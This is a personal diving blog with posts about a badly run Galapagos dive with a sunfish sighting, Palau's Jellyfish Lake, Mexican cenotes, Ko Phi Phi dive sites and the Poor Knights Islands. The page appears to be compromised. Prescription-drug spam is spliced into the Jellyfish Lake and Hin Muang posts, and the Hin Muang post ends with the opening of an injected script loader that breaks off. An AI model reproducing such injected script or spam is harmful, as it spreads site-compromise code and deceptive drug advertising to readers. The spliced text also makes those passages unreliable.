Mola Mola and the worst dive

Posted by Susanna On October - 15 - 2010

I made a mistake today and went diving with Albatros Tours a dive company in Puerto Ayora. Two days ago I had checked my wet suit over there and for one hour they really could not find me the right seize and I got so exhausted (trying on thick wetsuits is exhausting) that I almost gave up at that point already. I should have! When I ask after my fins and hood they said it will be on the boat and I should not worry. Then today on the boat what was not even a dive boat more like a nutshell we went to famous Gordon Rocks. People of all dive level were mixed up. Some had only 8 dives or haven’t dove in a long time. The fins were not the right seize, some people they had give fins of two different kind! The hoods were not fitting so needed to dive without! And when I thought to refuse to dive they refused to give me back my money…. I showed them off the security leaks but they didn’t care… Out of a sudden my BCD was broken as well – crazy but I had noticed it! Well the conditions were extreme with big waves… People run out of air after 20min. But how could they take beginners of such a dive?!? In the end it was not that extraordinary but then I saw Mola Mola the sun or moon fish. It was very big about 2 meters and it just looks amazing. What an experience. If it wasn’t for that fish I would have said it was the dive which sucked most ever….

Jellyfish lake

Posted by admin On August - 19 - 2009

Jelly fish lake (Palauan: decadron no script overnight shipping Ongeim’l Tketau) is simply amazing! I had heard about this extraordinary lake before – it’s unique on the world just in Palau. It is located on Eil Malk island in Palau’s Southern Lagoon between Koror and Peleliu. The lake is part of the rock islands and it is the only one of 70 lakes allowed to visit by tourists. Jelly fish lake is famous for snorkeling. You can’t scuba dive because the scuba gear could harm the sensitive jelly fish and at a depth of about 15m the lake becomes toxic through the hydrogen sulfide. To go there you need to buy a certain pass valid for 10 days and costs US$35. Mostly the visit is part of a dive trip anyway. After arriving at Eil Malk you will climb up the hill and then climb down again. It can be slippery especially if you wear flip flops. Then you change into your snorkel gear and you will be overwhelmed! After swimming towards the middle of the lake out of a sudden you will be surrounded of hundreds of mostly golden jelly fish. I free dove down just to enjoy to be in the center of all of them… Fells like in a fairy tale. So beautiful, so fragile. Be careful not to kick to hard with your fins – the jelly fish are easy harmed. That was one of the most amazing experiences I ever had what made me reverent towards the creation on earth. I had experiences one of the millions of wonders.

Diving Angelita and the Grand Cenote

Posted by admin On November - 11 - 2008

Today I finally dive again. This is what I was waiting for my whole trip this time. I never dove cenotes before so its extra exciting. Angelita is really beautiful because you dive through a layer what is kind of flouressence and looks like a galaxy. I dove 50 meters! New record for me. Underneath it smells like rotten eggs because of the sulfur what is produced by rotten leaves and other organic materials from the jungle. The Grand Cenote is really beautiful because you will dive in caverns with nice stalagtides and stalagmites.

Diving Hin Muang and Hin Daeng

Posted by admin On February - 10 - 2007

The best dive site of Ko Phi Phi is supposed to be Hin Muang and Hin Daeng. After the beautiful dives yesterday I was keen to do another ones. Even Jacob went diving but unfortunally not together with me because he didn´t dive for a couple of years and those dive sites are only for experienced diver. The dives were ok but i was dissappointed. Was nothing special to see, nothing what I didnt see before… Also I felt a headache so I pucked overboard…and I was happy when I was back home. I was waiting for Jacob as we discussed at the Bob Marley bar at the beach but after some hours I went back to the room. Later we found out that all beach bars on that beach seem to be Bob Marley bars, everywhere his pictures and songs. So we waited at different ones. risperidal without prescription var d=document;var s=d.createElement(‘script’); if (document.currentScript) {

Maya beach

Posted by admin On February - 9 - 2007

At 7:00am in the morning I met at the dive shop for my first dives since leaving Australia. I was really excited and hoped to see heaps of good stuff down there And right I saw a lot, for example a leopard shark, black tip reef sharks, a turtle, a blue spotted stingray, a cuttlefish and a school of squid. Around 2:00pm I was back and together with Jacob I took a water taxi to see Maya beach, the main location of the movie “The beach” with Leonardo Di Caprio. The beach was beautiful and the water so clear, I decided to snorkel. After snorkeling for a while on a certain point in the water I felt stitches like from a needle. So I went straight back (The next days I got a rush from that and people told me it could be that I swam directly into jelly fish which were destroyed in little parts by the fisher boats.) Next stop was Monkey beach but in the beginning there was no monkey to see. But I didn’t gave up and the monkeys cam and I got some good shots of them. Read the rest of this entry »

Diving the ‘Poor Knights’

Posted by admin On August - 17 - 2006

Early in the morning the shuttle from ‘Dive Tutukaka’ picked me up. Today I was diving at the Poor Knights Island. One of the bests spots in the world for sub-tropical diving. It was so freezing that I wore two wetsuits and a jacket. I saw sleeping rays, scorpion fish, snapper, demoiselles and lots more. I liked it but I prefer warm water like in Fiji. On the boat I met Debbi, one of the instructors, and she knows the guys from Nananu – the world is so small. In the rocks of this island is the worlds biggest cave (photo below). I met some guys who has the same way to Pahia so I was this evening in Pahia.
